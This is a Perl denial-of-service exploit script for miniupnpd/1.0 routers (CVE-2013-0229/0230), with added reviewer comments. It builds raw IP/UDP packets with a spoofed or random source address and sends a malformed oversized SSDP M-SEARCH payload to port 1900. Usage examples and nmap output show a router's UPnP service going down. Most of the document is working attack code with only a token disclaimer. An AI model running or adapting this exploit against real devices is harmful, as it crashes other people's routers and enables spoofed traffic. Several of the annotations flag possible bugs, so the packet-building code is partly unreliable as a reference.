miniupnpd/1.0 DoS or stack overflow (PoC) by Todor Donev

  1. #!/usr/bin/perl
  2. #
  3. #  miniupnpd/1.0 remote denial of service or stack overflow (PoC)
  4. #
  5. #  Copyright 2015 (c) Todor Donev
  6. #  todor.donev@gmail.com
  7. #  http://www.ethical-hacker.org/
  8. #  https://www.facebook.com/ethicalhackerorg
  9. #
#  The SSDP protocol is used to discover Plug & Play devices
#  in UPnP (Universal Plug and Play). SSDP is an HTTP-like
#  protocol that works with the NOTIFY and M-SEARCH
#  methods.
  14. #
  15. #  See also:
  16. #  CVE-2013-0229
  17. #  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229  
  18. #  CVE-2013-0230
  19. #  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
  20. #  
  21. #  Tested on
  22. #  Device Name :            IMW-C920W
  23. #  Device Manufacturer :    INFOMARK (http://infomark.co.kr)
  24. #  
  25. #  These devices are commonly used by Max Telecom, Bulgaria
  26. #
  27. #  Disclaimer:
  28. #  This or previous program is for Educational
  29. #  purpose ONLY. Do not use it without permission.
  30. #  The usual disclaimer applies, especially the
  31. #  fact that Todor Donev is not liable for any
  32. #  damages caused by direct or indirect use of the
  33. #  information or functionality provided by these
  34. #  programs. The author or any Internet provider
  35. #  bears NO responsibility for content or misuse
  36. #  of these programs or any derivatives thereof.
  37. #  By using these programs you accept the fact
  38. #  that any damage (dataloss, system crash,
  39. #  system compromise, etc.) caused by the use
  40. #  of these programs is not Todor Donev's
  41. #  responsibility.
  42. #  
  43. #  Use at your own risk!
  44. #
  45. #  See also:
  46. #  SSDP Reflection DDoS Attacks
  47. #  http://tinyurl.com/mqwj6xt
  48. #
  49. #######################################
  50. #
  51. # # perl miniupnpd.pl
  52. #
  53. # [  miniupnpd/1.0 remote denial of service exploit ]
  54. # [ =============================================== ]
  55. # [  Usage:              
  56. # [ ./miniupnpd.pl <victim address> <spoofed address>
  57. # [  Example:
  58. # [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
  59. # [  Example:
  60. # [ perl miniupnpd.pl 192.168.1.1
  61. # [ =============================================== ]
  62. # [ 2015  <todor.donev@gmail.com> Todor Donev  2015 ]
  63. #
  64. # # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
  65. #
  66. # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
  67. # Nmap scan report for 192.168.1.1
  68. # Host is up (0.00078s latency).
  69. # PORT     STATE SERVICE
  70. # 1900/udp open  upnp
  71. # | upnp-info:
  72. # | 192.168.1.1
  73. # |     Server: 1.0 UPnP/1.0 miniupnpd/1.0
  74. # |     Location: http://192.168.1.1:5000/rootDesc.xml
  75. # |       Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
  76. # |       Name: INFOMARK Router
  77. # |       Manufacturer: INFOMARK
  78. # |       Model Descr: INFOMARK Router
  79. # |       Model Name: INFOMARK Router
  80. # |       Model Version: 1
  81. # |       Name: WANDevice
  82. # |       Manufacturer: MiniUPnP
  83. # |       Model Descr: WAN Device
  84. # |       Model Name: WAN Device
  85. # |       Model Version: 20070228
  86. # |       Name: WANConnectionDevice
  87. # |       Manufacturer: MiniUPnP
  88. # |       Model Descr: MiniUPnP daemon
  89. # |       Model Name: MiniUPnPd
  90. # |_      Model Version: 20070228
  91. # MAC Address: 00:00:00:00:00:00 (Infomark Co.)           // CENSORED
  92. #  
  93. # Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
  94. #
  95. # # perl miniupnpd.pl 192.168.1.1
  96. #
  97. # [  miniupnpd/1.0 remote denial of service exploit ]
  98. # [ =============================================== ]
  99. # [ Target: 192.168.1.1
  100. # [ Send malformed SSDP packet..
  101. #
  102. # # nmap -sU 192.168.1.1 -p1900
  103. #  
  104. # Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
  105. # Nmap scan report for 192.168.1.1
  106. # Host is up (0.00085s latency).
  107. # PORT     STATE  SERVICE
  108. # 1900/udp closed upnp                                    // GOOD NIGHT, SWEET PRINCE.... :D
  109. # MAC Address: 00:00:00:00:00:00 (Infomark Co.)           // CENSORED
  110. #  
  111. # Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
  112. #
  113. #
  114. # Special thanks to HD Moore ..
  115. #

use Socket;

# Raw sockets need CAP_NET_RAW, so the script refuses to run unless uid is 0.
# NOTE(review): this path exits with status 0, so a caller cannot tell the
# refusal from a normal run.
if ( $< != 0 ) {
   print "Sorry, must be run as root!\n";
   print "This script use RAW Socket.\n";
   exit;
}

# Packed 4-byte addresses: element [4] of gethostbyname's list return is the
# first address. Neither argument is validated — a missing or unresolvable
# name simply leaves the variable undef. $ARGV[1] (the spoofed source) is
# optional; iphdr() handles its absence.
my $ip_src = (gethostbyname($ARGV[1]))[4];
my $ip_dst = (gethostbyname($ARGV[0]))[4];

print "\n[  miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
select(undef, undef, undef, 0.40);    # four-arg select used as a 0.4 s sleep

# Usage banner. This branch is also taken when the victim name does not
# resolve, not only when the argument is absent.
if (!defined $ip_dst) {
    print "[  Usage:\n[ ./$0 <victim address> <spoofed address>\n";
    select(undef, undef, undef, 0.55);
    print "[  Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
    print "[  Example:\n[ perl $0 192.168.1.1\n";
    print "[ =============================================== ]\n";
    print "[ 2015  <todor.donev\@gmail.com> Todor Donev  2015 ]\n\n";
    exit;
}
# Raw IPv4 socket with protocol 255 (IPPROTO_RAW). RAW is a bareword
# package-global handle that send_packet() reads. The setsockopt call passes
# raw numbers (level 0, option 1, value 1); which option that is depends on
# the platform's header values — NOTE(review): on Linux, option 1 at level
# IPPROTO_IP is IP_TOS rather than IP_HDRINCL, and IPPROTO_RAW already
# implies IP_HDRINCL, which is presumably what lets iphdr()'s header go out
# unchanged; confirm which option was intended.
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();

    # Main program: assemble one raw datagram (IP header + UDP header +
    # SSDP payload) and send it. Called once at file scope after the RAW
    # socket is opened; every helper reads the file-scoped $ip_src/$ip_dst
    # and the RAW handle rather than taking arguments. payload() is
    # evaluated here and again inside udphdr() (for the length only), so the
    # random filler bytes sent are not the ones udphdr() measured — the
    # length is fixed, so the header still matches.
sub main {
    my $packet;
   
    $packet = iphdr();
    $packet .= udphdr();
    $packet .= payload();
    # b000000m...
    send_packet($packet);
}

    # IP header (Layer 3)
    # Packs the 20-byte IPv4 header. Reads the file-scoped $ip_src / $ip_dst
    # (packed addresses). The pack template below hands several fields to
    # 'H2'/'h2'/'B16' as decimal *strings* interpreted as hex or bit strings,
    # so the on-wire bytes are not simply the decimal values in the trailing
    # comments — verify against a capture before relying on any of them.
sub iphdr {
    my $ip_ver           = 4;                       # IP Version 4            (4 bits)
    my $iphdr_len        = 5;                        # IP Header Length        (4 bits) in 32-bit words
    my $ip_tos           = 0;                        # Differentiated Services (8 bits)
    my $ip_total_len     = $iphdr_len + 20;          # Total Length (16 bits) — NOTE(review): evaluates to 25 and omits the UDP header and payload; whether the kernel rewrites it is platform-specific, confirm
    my $ip_frag_id       = 0;                        # Identification Field    (16 bits)
    my $ip_frag_flag     = 000;                      # IP Frag Flags (R DF MF) (3 bits) — octal literal, value 0
    my $ip_frag_offset   = 0000000000000;            # IP Fragment Offset      (13 bits) — octal literal, value 0
    my $ip_ttl           = 255;                      # IP TTL                  (8 bits) — packed via 'h2' as a hex string, see note above
    my $ip_proto         = 17;                       # IP Protocol             (8 bits) — UDP
    my $ip_checksum      = 0;                        # IP Checksum             (16 bits) — not computed here
    # NOTE(review): `my` in a statement modifier is undefined behaviour per
    # perlsyn. The condition tests the file-scoped $ip_src, while the new
    # lexical shadows it for the pack() below. `&randip` (no parens)
    # bypasses randip's prototype and passes this sub's @_ through.
    # Scalar-context gethostbyname returns the packed address.
    my $ip_src=gethostbyname(&randip) if !$ip_src;     # IP Source       (32 bits)
    # IP Packet construction: 'H2' turns the string "45" into the single
    # version|IHL byte; 'B16' gets the bit string "0"."0" and zero-pads it to
    # 16 bits (flags 0, offset 0).
  my $iphdr  = pack(
        'H2 H2 n n B16 h2 c n a4 a4',
        $ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
        $ip_frag_id, $ip_frag_flag . $ip_frag_offset,
        $ip_ttl, $ip_proto, $ip_checksum,
        $ip_src, $ip_dst
      );

        return $iphdr;
}
  180.  
  181.     # UDP header (Layer 4)
  182. sub udphdr {
  183.     my $udp_src_port  = 31337;                     # UDP Sort Port           (16 bits) (0-65535)
  184.     my $udp_dst_port  = 1900;                       # UDP Dest Port           (16 btis) (0-65535)
  185.     my $udp_len    = 8 + length(payload());     # UDP Length              (16 bits) (0-65535)
  186.     my $udp_checksum   = 0;                         # UDP Checksum            (16 bits) (XOR of header)
  187.  
  188.     # UDP Packet
  189.       my $udphdr      = pack(
  190.         'n n n n',
  191.         $udp_src_port, $udp_dst_port,
  192.         $udp_len, $udp_checksum
  193.         );
  194.         return $udphdr;
  195. }
  196.  
  197.     # Create SSDP Bomb
  198. sub payload {
  199.      my $data;
  200.      my $head;
  201.      $data = "M-SEARCH * HTTP\/1.1\\r\\n";
  202.      for (0..1260) { $data .= chr( int(rand(25) + 65) ); }
  203.      my $payload = pack('a' . length($data), $data);
  204. return $payload;
  205. }

    # Generate random source ip address
    # Returns a dotted-quad string with each octet in 0..254 (int(rand(255))),
    # e.g. "10.0.0.1" (constructed example). iphdr() calls this as `&randip`,
    # which bypasses the empty `()` prototype declared here and passes the
    # caller's @_ through. Reseeds the process-wide RNG on every call from
    # time and pid, which also changes the sequence payload()'s rand() draws.
sub randip () {
srand(time() ^ ($$ + ($$ << 15)));
     my $ipdata;
        $ipdata   = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";    # the trailing , "\n" is a comma-operator no-op
     my $ipsrc     = pack('A' . length($ipdata), rand($ipdata));    # unused; NOTE(review): still consumes one rand() value
return $ipdata;
}

    # Send the malformed packet
    # $_[0] is the assembled datagram (IP header + UDP header + payload)
    # from main(). Writes it once to the file-scoped RAW handle and dies if
    # send() fails. The destination argument is a hand-packed sockaddr_in:
    # 'S' family (native short), 'n' port 60, 'a4' $ip_dst, 'x8' zero
    # padding — Socket's pack_sockaddr_in(60, $ip_dst) builds an equivalent
    # struct portably. The port here is not the UDP destination (udphdr
    # carries 1900); presumably ignored for a raw IPv4 send — confirm.
sub send_packet {
    print "[ Target: $ARGV[0]\n";
    select(undef, undef, undef, 0.30);    # 0.3 s pause before sending
    print "[ Send malformed SSDP packet..\n\n";
    send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
}